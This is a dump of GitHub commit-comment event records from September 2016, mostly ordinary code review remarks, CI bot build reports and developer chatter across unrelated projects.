{"id":"4634599625","type":"CommitCommentEvent","actor":{"login":"antmdvs"},"repo":{"name":"aspnet/JavaScriptServices"},"payload":{"comment":{"id":19217741,"position":null,"line":null,"path":null,"commit_id":"b4bec30b0f1610f759bb5dd369a24bd26484ba86","created_at":"2016-09-29T02:03:14Z","updated_at":"2016-09-29T02:03:14Z","body":"What's the reason for combining dependencies and devDependencies? Does this have something to do with the server-side redirect support?"}},"created_at":"2016-09-29T02:03:14Z"}
{"id":"4634599734","type":"CommitCommentEvent","actor":{"login":"jinoohome"},"repo":{"name":"jinoohome/searchStudyProject"},"payload":{"comment":{"id":19217742,"position":5,"line":9,"path":"searchStudy/.classpath","commit_id":"8eb5950ce6e0340e8101e4a78708ecd253134997","created_at":"2016-09-29T02:03:16Z","updated_at":"2016-09-29T02:03:16Z","body":"<classpathentry kind=\"con\" path=\"org.eclipse.jst.server.core.container/org.eclipse.jst.server.tomcat.runtimeTarget/Apache Tomcat v8.0\">"}},"created_at":"2016-09-29T02:03:16Z"}
{"id":"4634604891","type":"CommitCommentEvent","actor":{"login":"meshonline"},"repo":{"name":"meshonline/rhubarb-lip-sync"},"payload":{"comment":{"id":19217748,"position":null,"line":null,"path":null,"commit_id":"fedfd30e193f35df20c20aea546e8219100485d8","created_at":"2016-09-29T02:04:56Z","updated_at":"2016-09-29T02:04:56Z","body":"This file is the Blender plug-on for importing the Papagayo format output files."}},"created_at":"2016-09-29T02:04:56Z"}
{"id":"4634606153","type":"CommitCommentEvent","actor":{"login":"bridiver"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19217750,"position":null,"line":null,"path":null,"commit_id":"7516f02346a12830ed2ce80d703ab781562d9c2d","created_at":"2016-09-29T02:05:20Z","updated_at":"2016-09-29T02:05:20Z","body":"Did you forget to push a file for GQ.xml? Starting with this commit the tests don't even run"}},"created_at":"2016-09-29T02:05:20Z"}
{"id":"4634610436","type":"CommitCommentEvent","actor":{"login":"kafunk"},"repo":{"name":"kafunk/project_cli_connect_four"},"payload":{"comment":{"id":19217759,"position":null,"line":null,"path":null,"commit_id":"e7aed522d777609fddb9415622239532e5e7f29a","created_at":"2016-09-29T02:06:43Z","updated_at":"2016-09-29T02:06:43Z","body":"-space out board more\r\n-clarify that ø = red\r\n-make sure board renders final display"}},"created_at":"2016-09-29T02:06:43Z"}
{"id":"4634610817","type":"CommitCommentEvent","actor":{"login":"SunyataZero"},"repo":{"name":"peoples-fund/peoples-fund"},"payload":{"comment":{"id":19217760,"position":142,"line":145,"path":"docs/req-spec.md","commit_id":"fd5e3f391bf331f2a7b0df9864e0f7a2c3d0bfab","created_at":"2016-09-29T02:06:52Z","updated_at":"2016-09-29T02:06:52Z","body":"*Closing membership accounts:*\nI think we should not delete the account since we want to have the\nhistory/stats from that person/membership, but possibly we could disallow\nlog in and we probably want to cancel the membership benefits defined in\nWP/CiviCRM. Maybe still allowing the users to log in would be good though,\nso that if they want to become members again they could do so more easily?\n(I'm not sure, maybe it's easy anyway)\n\nThe bottom line is that we can choose what users can do when they are no\nlonger members, but we need to decide if we allow them to log in. Once we\nknow what we want i can check to see if it's possible to do\n\n\n\n\n*Membership lengths:*\nI can see in the extensive settings that are available for CiviMember that\nit's possible to set the membership length to one year:\n\n[image: Inline image 1]\n\nKind Regards,\nTord\n\nOn Wed, Sep 28, 2016 at 10:38 PM, frederikfederspiel <\nnotifications@github.com> wrote:\n\n> I don't know if we should close their account though... Hmm, I'll think\n> about that too, please tell me if you have a suggestion\n>\n> 2016-09-28 22:37 GMT+02:00 Frederik Federspiel <\n> frederikfederspiel@gmail.com\n> >:\n>\n> > Hmm, I'll have to give that a think. We could perhaps have like a\n> > \"life-long membership\" or \"honorary member thing\", where you just paid\n> the\n> > annual fee and didn't have to donate monthly anymore if you wanted to\n> stop.\n> > Or maybe we shouldn't, I'll think about it...\n> >\n> > ... which brings me to say:\n> >\n> > That we will need to have annual fees. There will have to be\n> > \"kontingenter\", which will be like 100 kr or 150 kr or so and then the\n> > monthly donations on top. This is for legal reasons in terms of our\n> members\n> > in Denmark being given a tax deduction for their donations to us and for\n> us\n> > being eligible for Danish Development Aid support and/or another major\n> fund\n> > in Denmark, not to mention tons of other funds. We will very much be\n> valued\n> > by the amount of \"kontingentbetalende\" (annual fee paying) members, and\n> > that has to be an annual fee, not just monthly donations.\n> >\n> > I'm sure that should be rather easy to do with stripe...?\n> >\n> > 2016-09-28 21:07 GMT+02:00 Tord <notifications@github.com>:\n> >\n> >> Sorry to nitpick but if we want to see the \"History of one-time\n> donations\n> >> visible for user\" (see above) we need to connect the donations made by\n> >> logged in users to their account. I will create a new requirement for\n> >> donations for non-members\n> >>\n> >> —\n> >> You are receiving this because you were mentioned.\n> >> Reply to this email directly, view it on GitHub\n> >> <https://github.com/peoples-fund/peoples-fund/commit/\n> fd5e3f391bf331f2a7b0df9864e0f7a2c3d0bfab#commitcomment-19212890>,\n> >> or mute the thread\n> >> <https://github.com/notifications/unsubscribe-auth/\n> ACAukbcwnloKp6e8UVDBe3X0yZO9wn1pks5qursJgaJpZM4KJL2t>\n> >> .\n> >>\n> >\n> >\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/peoples-fund/peoples-fund/commit/fd5e3f391bf331f2a7b0df9864e0f7a2c3d0bfab#commitcomment-19214265>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AJxWOM7spcVqZdnnaQzsuX4N_UWCVgwRks5qutBjgaJpZM4KJL2t>\n> .\n>\n\n\n\n-- \nPublic PGP key:\nhttps://pgp.mit.edu/pks/lookup?op=get&search=0xA8D18333F40F0D93\n\nBeyond our ideas of right and wrong doing there is a field, I'll meet you\nthere\n-- Rumi\n<http://ihavearrived.org/>\n"}},"created_at":"2016-09-29T02:06:52Z"}
{"id":"4634610911","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19217761,"position":null,"line":null,"path":null,"commit_id":"e10aefb982f1373364cced5ca82a80e6ab0b1de3","created_at":"2016-09-29T02:06:54Z","updated_at":"2016-09-29T02:06:54Z","body":"os_2_0_develop (macumber) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-e10aefb982f1373364cced5ca82a80e6ab0b1de3-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-e10aefb982f1373364cced5ca82a80e6ab0b1de3-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-29T02:06:54Z"}
{"id":"4634617186","type":"CommitCommentEvent","actor":{"login":"Aokromes"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19217777,"position":null,"line":null,"path":null,"commit_id":"e2c92dbc63a16f07bd46b2423cfe23fc22ab90b0","created_at":"2016-09-29T02:08:56Z","updated_at":"2016-09-29T02:08:56Z","body":"Well, since we are the ones who assing guids, there is no real need of make it public, it helps to annoy people who don't shares fixes busy :P"}},"created_at":"2016-09-29T02:08:56Z"}
{"id":"4634618857","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19217788,"position":null,"line":null,"path":null,"commit_id":"e10aefb982f1373364cced5ca82a80e6ab0b1de3","created_at":"2016-09-29T02:09:31Z","updated_at":"2016-09-29T02:09:31Z","body":"os_2_0_develop (macumber) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-e10aefb982f1373364cced5ca82a80e6ab0b1de3-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-e10aefb982f1373364cced5ca82a80e6ab0b1de3-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-29T02:09:31Z"}
{"id":"4634619408","type":"CommitCommentEvent","actor":{"login":"cheezgi"},"repo":{"name":"cheezgi/fed"},"payload":{"comment":{"id":19217791,"position":44,"line":83,"path":"parse/parse.factor","commit_id":"8b0c88b41401215a4e0b082744b0f9fdd3a81958","created_at":"2016-09-29T02:09:42Z","updated_at":"2016-09-29T02:09:42Z","body":"this is what fucked me up, I didn't realize that this was causing the problem\r\n\r\nI didn't want to accept something like 23,23i but I was because of this\r\n\r\nthen I changed the range parser to have f in the second slot to represent something like 23i\r\nbecause that would be equivalent to 23,23i earlier so yeah\r\n\r\nfuck"}},"created_at":"2016-09-29T02:09:42Z"}
{"id":"4634620061","type":"CommitCommentEvent","actor":{"login":"roblav96"},"repo":{"name":"NativeScript/tns-core-modules-widgets"},"payload":{"comment":{"id":19217793,"position":null,"line":null,"path":null,"commit_id":"b85806a8b059a58103497ef3ef441fe7f3dd6939","created_at":"2016-09-29T02:09:57Z","updated_at":"2016-09-29T02:09:57Z","body":"woot :D"}},"created_at":"2016-09-29T02:09:57Z"}
{"id":"4634621918","type":"CommitCommentEvent","actor":{"login":"cheezgi"},"repo":{"name":"cheezgi/fed"},"payload":{"comment":{"id":19217799,"position":44,"line":83,"path":"parse/parse.factor","commit_id":"8b0c88b41401215a4e0b082744b0f9fdd3a81958","created_at":"2016-09-29T02:10:38Z","updated_at":"2016-09-29T02:10:38Z","body":"and I didn't realize that I still had it, so when I was debugging I saw { 23 23 } and was like no, that's supposed to be { 23 f } and I was really close to touching the EBNF parser and that would be baad times"}},"created_at":"2016-09-29T02:10:38Z"}
{"id":"4634622197","type":"CommitCommentEvent","actor":{"login":"Stane1983"},"repo":{"name":"LibreELEC/LibreELEC.tv"},"payload":{"comment":{"id":19217800,"position":null,"line":null,"path":null,"commit_id":"40cab058daf7d14f2cc3c3ccc8b59a2b483b2fe3","created_at":"2016-09-29T02:10:43Z","updated_at":"2016-09-29T02:10:43Z","body":"Nothing really, for this repository as is it works just fine. It's just not right.... platform != architecture if you want. Call me crazy :)"}},"created_at":"2016-09-29T02:10:43Z"}
{"id":"4634624102","type":"CommitCommentEvent","actor":{"login":"diegollams"},"repo":{"name":"thebitcorps/Buildify"},"payload":{"comment":{"id":19217804,"position":5,"line":9,"path":"db/migrate/20160920013148_add_purchase_order_to_payment.rb","commit_id":"ba2a2f27e7b07131e6353e741df5b317e8280fed","created_at":"2016-09-29T02:11:21Z","updated_at":"2016-09-29T02:11:21Z","body":"what are thooseeeeeee!"}},"created_at":"2016-09-29T02:11:21Z"}
{"id":"4634625340","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"mat-mr/crescer-2016-2"},"payload":{"comment":{"id":19217807,"position":29,"line":29,"path":"src/modulo-01-java-OO/modulo-01/DataTerceiraEra.java","commit_id":"ae22404e4306b89a52195667dd8931447948e8d4","created_at":"2016-09-29T02:11:48Z","updated_at":"2016-09-29T02:11:48Z","body":"Bacana. É possível diminuir ainda mais este código. O que você acha?"}},"created_at":"2016-09-29T02:11:48Z"}
{"id":"4634625453","type":"CommitCommentEvent","actor":{"login":"3thanZ"},"repo":{"name":"GoogleCloudPlatformTraining/cpd200-conference-central-java"},"payload":{"comment":{"id":19217808,"position":5,"line":31,"path":"default/src/main/webapp/index.html","commit_id":"7c4d8864cb8cff4ea41ef8b7312baa655a3f4410","created_at":"2016-09-29T02:11:50Z","updated_at":"2016-09-29T02:11:50Z","body":"Hi @sharifsalah \r\n\r\nBecause this is removed, there are problems with the OAuth authentication for securing endpoints."}},"created_at":"2016-09-29T02:11:50Z"}
{"id":"4634628164","type":"CommitCommentEvent","actor":{"login":"DDuarte"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19217815,"position":null,"line":null,"path":null,"commit_id":"e2c92dbc63a16f07bd46b2423cfe23fc22ab90b0","created_at":"2016-09-29T02:12:49Z","updated_at":"2016-09-29T02:12:49Z","body":"There's no reason to keep that private but not because of PRs, those guids are assigned by us on merge."}},"created_at":"2016-09-29T02:12:49Z"}
{"id":"4634632217","type":"CommitCommentEvent","actor":{"login":"aviraxp"},"repo":{"name":"veryyoung/WechatLuckyMoney"},"payload":{"comment":{"id":19217824,"position":null,"line":null,"path":null,"commit_id":"e86ec3a38fea42c9a7620c0314ea5020c9ae2c47","created_at":"2016-09-29T02:14:17Z","updated_at":"2016-09-29T02:14:17Z","body":"这个好"}},"created_at":"2016-09-29T02:14:17Z"}
{"id":"4634632525","type":"CommitCommentEvent","actor":{"login":"luisgreg99"},"repo":{"name":"osulp/Room-Reservation"},"payload":{"comment":{"id":19217826,"position":null,"line":null,"path":null,"commit_id":"ebe6a6d7a014dfa217d9b8cf4a3676bb34a7f71b","created_at":"2016-09-29T02:14:24Z","updated_at":"2016-09-29T02:14:24Z","body":"- This commit contains the initial upgrade changes that are introduced in Rails 4.2. According to the release notes in Rails 5, upgrading to Rails 4.2 is recommended first in order to take advantage of the release notes and deprecated messages introduced with each release. \r\n\r\n- There is also a new Dockerfile and docker-compose yml that can be used to test the current upgrade and aid in future development (it builds a container for each service: db, redis, sidekiq, and web). To run it, we just need to do\r\n```\r\ndocker-compose build\r\ndocker-compose up\r\n```\r\nand then go to localhost:9000\r\n- In the readme, I have also added instructions to create an admin user for development\r\n\r\n- The next step is to upgrade to Rails 5. The upgrading rails guide has been very helpful: http://guides.rubyonrails.org/upgrading_ruby_on_rails.html"}},"created_at":"2016-09-29T02:14:24Z"}
{"id":"4634633312","type":"CommitCommentEvent","actor":{"login":"kirillzh"},"repo":{"name":"markcerqueira/chuckpad-social-rails"},"payload":{"comment":{"id":19217829,"position":null,"line":null,"path":null,"commit_id":"84e6f755c4f3e6ddd30e6055de14dcd0d0e5ecfd","created_at":"2016-09-29T02:14:41Z","updated_at":"2016-09-29T02:14:41Z","body":"Actually it was me."}},"created_at":"2016-09-29T02:14:41Z"}
{"id":"4634635510","type":"CommitCommentEvent","actor":{"login":"sunzh231"},"repo":{"name":"packageman/docker-dev"},"payload":{"comment":{"id":19217834,"position":null,"line":null,"path":null,"commit_id":"34b6412511bc23180210ad190b338d7b1a1c68a8","created_at":"2016-09-29T02:15:31Z","updated_at":"2016-09-29T02:15:31Z","body":"华哥英文真好"}},"created_at":"2016-09-29T02:15:31Z"}
{"id":"4634639566","type":"CommitCommentEvent","actor":{"login":"nbougalis"},"repo":{"name":"vinniefalco/Beast"},"payload":{"comment":{"id":19217842,"position":35,"line":53,"path":"include/beast/websocket/detail/mask.hpp","commit_id":"8eac73fb251ada352e85fee40af72e32c74cbfd4","created_at":"2016-09-29T02:16:59Z","updated_at":"2016-09-29T02:16:59Z","body":"The state for xorshift is 128 bits. We're pulling exactly 128 bits out.\r\n\r\nIf `std::leastuint32_t` is 32 bits, the left shift by 32 will make it all zeroes.\r\n\r\nIf `std::leastuint32_t` is 64 bits, the left shift will throw away 32 bits.\r\n\r\nEither way, you throw away 32 bits of entropy."}},"created_at":"2016-09-29T02:16:59Z"}
{"id":"4634640559","type":"CommitCommentEvent","actor":{"login":"colepatrickturner"},"repo":{"name":"colepatrickturner/graphql-rails-resolver"},"payload":{"comment":{"id":19217845,"position":92,"line":125,"path":"lib/graphql/rails/resolver.rb","commit_id":"40c602b1252f1bacc3e19c129674ea38f06a23b3","created_at":"2016-09-29T02:17:22Z","updated_at":"2016-09-29T02:17:22Z","body":"TODO:\r\n`scope_name = scope_name.call(value) if scope_name.respond_to? :call`"}},"created_at":"2016-09-29T02:17:22Z"}
{"id":"4634644266","type":"CommitCommentEvent","actor":{"login":"cheezgi"},"repo":{"name":"cheezgi/fed"},"payload":{"comment":{"id":19217853,"position":8,"line":34,"path":"README.md","commit_id":"afa343acf23f3a1f87e6675a491bd722df8f02d7","created_at":"2016-09-29T02:18:44Z","updated_at":"2016-09-29T02:18:44Z","body":"I kinda think it's my fault though for starting with such a naive implementation of commands and then tacking shit on. I'm pretty sure the whole spirit of factor everything is to slowly build from the ground up.\r\n\r\nStarting with a parser probably would have been a better approach."}},"created_at":"2016-09-29T02:18:44Z"}
{"id":"4634646717","type":"CommitCommentEvent","actor":{"login":"yanxiaweiwei"},"repo":{"name":"yanxiaweiwei/cici"},"payload":{"comment":{"id":19217861,"position":null,"line":null,"path":null,"commit_id":"d44bc17aa5ed8fdc294fc0814fa9e70184076c56","created_at":"2016-09-29T02:19:43Z","updated_at":"2016-09-29T02:19:43Z","body":"45646"}},"created_at":"2016-09-29T02:19:43Z"}
{"id":"4634654388","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"mat-mr/crescer-2016-2"},"payload":{"comment":{"id":19217882,"position":13,"line":38,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"8bfce866dd451a34757e9f867d3af8ebfe1ddcbf","created_at":"2016-09-29T02:22:32Z","updated_at":"2016-09-29T02:22:32Z","body":"Não precisa desses parentêses."}},"created_at":"2016-09-29T02:22:32Z"}
{"id":"4634654696","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"mat-mr/crescer-2016-2"},"payload":{"comment":{"id":19217884,"position":10,"line":35,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"8bfce866dd451a34757e9f867d3af8ebfe1ddcbf","created_at":"2016-09-29T02:22:40Z","updated_at":"2016-09-29T02:22:40Z","body":"não precisa desses parênteses."}},"created_at":"2016-09-29T02:22:40Z"}
{"id":"4634663719","type":"CommitCommentEvent","actor":{"login":"alexander-golovanov"},"repo":{"name":"proofme/swig-email-templates"},"payload":{"comment":{"id":19217908,"position":null,"line":null,"path":null,"commit_id":"9eeb3191db6cd46980fd694e2032d717dcd6308b","created_at":"2016-09-29T02:25:59Z","updated_at":"2016-09-29T02:25:59Z","body":"Official 4.0 version is incompatible not only by API but by the way it treats paths in templates, as result produced output is missing all styling from CSS files."}},"created_at":"2016-09-29T02:25:59Z"}
{"id":"4634666949","type":"CommitCommentEvent","actor":{"login":"hoh1"},"repo":{"name":"hoh1/MIS3640"},"payload":{"comment":{"id":19217919,"position":null,"line":null,"path":null,"commit_id":"9b0a9edb7752527064a840710b917a0bdb09e51b","created_at":"2016-09-29T02:27:03Z","updated_at":"2016-09-29T02:27:03Z","body":"In-Class Activities"}},"created_at":"2016-09-29T02:27:03Z"}
{"id":"4634668822","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"mateusbpt/crescer-2016-2"},"payload":{"comment":{"id":19217926,"position":null,"line":null,"path":null,"commit_id":"80ed104bad3cb0320558c910794a0010b508455b","created_at":"2016-09-29T02:27:44Z","updated_at":"2016-09-29T02:27:44Z","body":"Onde está o construtor do exercício 3.2?"}},"created_at":"2016-09-29T02:27:44Z"}
{"id":"4634671636","type":"CommitCommentEvent","actor":{"login":"huluoyang"},"repo":{"name":"huluoyang/freecodecamp.cn"},"payload":{"comment":{"id":19217933,"position":null,"line":null,"path":null,"commit_id":"cb2b374c917540721522062e2776133a0ccf9cf2","created_at":"2016-09-29T02:28:45Z","updated_at":"2016-09-29T02:28:45Z","body":"Welcome to the new world!\r\n欢迎提出修订，可以尝试下pull request方式来提交你的修改。\r\n详情可以看看wiki。"}},"created_at":"2016-09-29T02:28:45Z"}
{"id":"4634672112","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"mateusbpt/crescer-2016-2"},"payload":{"comment":{"id":19217936,"position":19,"line":27,"path":"src/modulo-01-java-OO/modulo-01/DataTerceiraEra.java","commit_id":"511eb8423a0f9307605e0d5c3b0207339c6bd165","created_at":"2016-09-29T02:28:55Z","updated_at":"2016-09-29T02:28:55Z","body":"pode fazer direto então:\r\n\r\n```Java\r\nreturn ano%400 == 0 || (ano%100 != 0 && ano%4 == 0);\r\n```"}},"created_at":"2016-09-29T02:28:55Z"}
{"id":"4634674405","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"mareyc/homework-portfolio"},"payload":{"comment":{"id":19217946,"position":98,"line":98,"path":"Assignment Week 8/register.html","commit_id":"9fae075db5d868fba132aa40967ab8383a8424c4","created_at":"2016-09-29T02:29:45Z","updated_at":"2016-09-29T02:29:45Z","body":"Nice job grouping form elements together with the `<fieldset>` tag!"}},"created_at":"2016-09-29T02:29:45Z"}
{"id":"4634674655","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"cai799174/OpenStudio"},"payload":{"comment":{"id":19217948,"position":null,"line":null,"path":null,"commit_id":"33723b471757d30ef9cd4de3fcf826595ced4ee4","created_at":"2016-09-29T02:29:51Z","updated_at":"2016-09-29T02:29:51Z","body":"1973-AddDualDuctTerminals (cai799174) - x86_64-MacOS-10.10-clang: OK (2395 of 2447 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-33723b471757d30ef9cd4de3fcf826595ced4ee4-PR2358-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-33723b471757d30ef9cd4de3fcf826595ced4ee4-PR2358-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-97.87%25-yellow.svg)</a> \n"}},"created_at":"2016-09-29T02:29:51Z"}
{"id":"4634678373","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"mateusbpt/crescer-2016-2"},"payload":{"comment":{"id":19217954,"position":22,"line":26,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"3392a48023666197edabfbb11aeefae560298757","created_at":"2016-09-29T02:31:13Z","updated_at":"2016-09-29T02:31:13Z","body":"visto que estamos dentro da classe `Dwarf`, o sufixo `Dwarf` no nome da variável é desnecessário."}},"created_at":"2016-09-29T02:31:13Z"}
{"id":"4634680037","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"mateusbpt/crescer-2016-2"},"payload":{"comment":{"id":19217959,"position":25,"line":29,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"3392a48023666197edabfbb11aeefae560298757","created_at":"2016-09-29T02:31:48Z","updated_at":"2016-09-29T02:31:48Z","body":"Isso pode ser resumido a:\r\n\r\n```if (dataNascimento.ehBissexto() && vidaDwarf) {```"}},"created_at":"2016-09-29T02:31:48Z"}
{"id":"4634680061","type":"CommitCommentEvent","actor":{"login":"Fenoxo"},"repo":{"name":"OXOIndustries/Trials-in-Tainted-Space"},"payload":{"comment":{"id":19217960,"position":null,"line":null,"path":null,"commit_id":"6626d0de02ead70ae8b72f1fa32391a1eee4ca56","created_at":"2016-09-29T02:31:49Z","updated_at":"2016-09-29T02:31:49Z","body":"Good call. Will hit."}},"created_at":"2016-09-29T02:31:49Z"}
{"id":"4634680752","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"mareyc/homework-portfolio"},"payload":{"comment":{"id":19217964,"position":43,"line":43,"path":"Assignment Week 8/register.html","commit_id":"9fae075db5d868fba132aa40967ab8383a8424c4","created_at":"2016-09-29T02:32:02Z","updated_at":"2016-09-29T02:32:02Z","body":"Perhaps a more efficient way to do a dropdown when you have this many elements would be to use an array and append the items with JavaScript."}},"created_at":"2016-09-29T02:32:02Z"}
{"id":"4634680829","type":"CommitCommentEvent","actor":{"login":"thesonyman"},"repo":{"name":"tritechsc/pythonstarter"},"payload":{"comment":{"id":19217965,"position":null,"line":null,"path":null,"commit_id":"ae2e0e9cd12f38237f8b440fa709788c412337f9","created_at":"2016-09-29T02:32:03Z","updated_at":"2016-09-29T02:32:03Z","body":"updated"}},"created_at":"2016-09-29T02:32:03Z"}
{"id":"4634681463","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"mateusbpt/crescer-2016-2"},"payload":{"comment":{"id":19217967,"position":28,"line":32,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"3392a48023666197edabfbb11aeefae560298757","created_at":"2016-09-29T02:32:16Z","updated_at":"2016-09-29T02:32:16Z","body":"```if (!dataNascimento.ehBissexto() && nomeDwarf)```"}},"created_at":"2016-09-29T02:32:16Z"}
{"id":"4634682082","type":"CommitCommentEvent","actor":{"login":"Cubemaster7"},"repo":{"name":"Cubemaster7/OrbicTextAdventure"},"payload":{"comment":{"id":19217968,"position":null,"line":null,"path":null,"commit_id":"db5e4cc45c46c27db44616c536939f4e39a07b9a","created_at":"2016-09-29T02:32:29Z","updated_at":"2016-09-29T02:32:29Z","body":"But why"}},"created_at":"2016-09-29T02:32:29Z"}
{"id":"4634682486","type":"CommitCommentEvent","actor":{"login":"mkorcha"},"repo":{"name":"CSE-CSUSB/Constitution"},"payload":{"comment":{"id":19217970,"position":null,"line":null,"path":null,"commit_id":"a24f174f57cce96fcb0ef5c92f5890417f5b049f","created_at":"2016-09-29T02:32:39Z","updated_at":"2016-09-29T02:32:39Z","body":"Hey,\r\n\r\nSo typically you'd be editing the `constitution.md` and `bylaws.md` files in there instead of just committing a pre-built file. It helps keep track of versioning and changes between versions of the files.  Plus, just editing the markdown files makes it much easier to just read on Github. \r\n\r\nThe `README` has instructions on how to use the scripts we have to make these files in any format we want.\r\n\r\nJust thought I'd let you know! :)"}},"created_at":"2016-09-29T02:32:39Z"}
{"id":"4634682827","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"cai799174/OpenStudio"},"payload":{"comment":{"id":19217971,"position":null,"line":null,"path":null,"commit_id":"33723b471757d30ef9cd4de3fcf826595ced4ee4","created_at":"2016-09-29T02:32:47Z","updated_at":"2016-09-29T02:32:47Z","body":"1973-AddDualDuctTerminals (cai799174) - x86_64-Linux-Ubuntu-14.04-clang-3.5: OK (2369 of 2447 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-33723b471757d30ef9cd4de3fcf826595ced4ee4-PR2358-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-33723b471757d30ef9cd4de3fcf826595ced4ee4-PR2358-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-96.81%25-yellow.svg)</a> \n"}},"created_at":"2016-09-29T02:32:47Z"}
{"id":"4634686072","type":"CommitCommentEvent","actor":{"login":"nama1118"},"repo":{"name":"nama1118/holidoys_system"},"payload":{"comment":{"id":19217978,"position":6,"line":42,"path":"cakephp/app/View/Holidays/root_list.ctp","commit_id":"2ec6c64f4400a421ca8cc0e9217f8878b76aa0d8","created_at":"2016-09-29T02:33:57Z","updated_at":"2016-09-29T02:33:57Z","body":"yrdy"}},"created_at":"2016-09-29T02:33:57Z"}
{"id":"4634686257","type":"CommitCommentEvent","actor":{"login":"nama1118"},"repo":{"name":"nama1118/holidoys_system"},"payload":{"comment":{"id":19217979,"position":6,"line":42,"path":"cakephp/app/View/Holidays/root_list.ctp","commit_id":"2ec6c64f4400a421ca8cc0e9217f8878b76aa0d8","created_at":"2016-09-29T02:34:02Z","updated_at":"2016-09-29T02:34:02Z","body":"teadwadw"}},"created_at":"2016-09-29T02:34:02Z"}
{"id":"4634687327","type":"CommitCommentEvent","actor":{"login":"nama1118"},"repo":{"name":"nama1118/holidoys_system"},"payload":{"comment":{"id":19217983,"position":null,"line":null,"path":null,"commit_id":"2ec6c64f4400a421ca8cc0e9217f8878b76aa0d8","created_at":"2016-09-29T02:34:23Z","updated_at":"2016-09-29T02:34:23Z","body":"tear"}},"created_at":"2016-09-29T02:34:23Z"}
{"id":"4634688171","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"mareyc/homework-portfolio"},"payload":{"comment":{"id":19217985,"position":null,"line":null,"path":null,"commit_id":"9fae075db5d868fba132aa40967ab8383a8424c4","created_at":"2016-09-29T02:34:41Z","updated_at":"2016-09-29T02:34:41Z","body":"Overall, very well done! 💯 "}},"created_at":"2016-09-29T02:34:41Z"}
{"id":"4634693669","type":"CommitCommentEvent","actor":{"login":"murilao"},"repo":{"name":"malucooo/Otxserver-Global"},"payload":{"comment":{"id":19217999,"position":null,"line":null,"path":null,"commit_id":"195e0ac954d01419b62dbed89eee027c3175ff58","created_at":"2016-09-29T02:36:38Z","updated_at":"2016-09-29T02:36:38Z","body":"Ao da use você será teleportado para fora apenas se da use novamente ele não entra fica lado de fora esse é o jeito de arrumar bug da porta que outro player entra por dentro até que alguem resolva esse problema ou ficará assim. :)"}},"created_at":"2016-09-29T02:36:38Z"}
{"id":"4634697675","type":"CommitCommentEvent","actor":{"login":"techra"},"repo":{"name":"KunaiFire/rechat-dl"},"payload":{"comment":{"id":19218011,"position":null,"line":null,"path":null,"commit_id":"2b4f25637ecfa17d51a174841b23e39299477af2","created_at":"2016-09-29T02:37:58Z","updated_at":"2016-09-29T02:37:58Z","body":"I tried reinstalling with Python 3.5.2 as an administrator, and get \"The specified service does not exist as an installed service. (Error Code: 0x80070424).\" Googling that error makes me confused."}},"created_at":"2016-09-29T02:37:58Z"}
